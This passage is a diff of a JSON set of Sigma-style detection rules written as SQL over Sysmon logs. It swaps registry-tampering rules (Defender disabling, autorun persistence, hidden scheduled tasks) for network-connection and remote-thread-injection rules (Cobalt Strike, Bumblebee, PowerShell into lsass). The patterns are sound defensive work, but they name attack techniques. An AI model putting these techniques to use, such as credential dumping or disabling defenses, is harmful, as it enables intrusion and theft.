], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + 
"attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun 
keys for legitimate reason" + "Legitimate msiexec over networks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "status": "experimental", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR 
(Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' 
ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "Persistence Via Disk Cleanup 
Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "status": "test", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR 
Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE 
'%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE 
'\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in 
registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' 
AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], 
"falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL 
into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "status": "experimental", - 
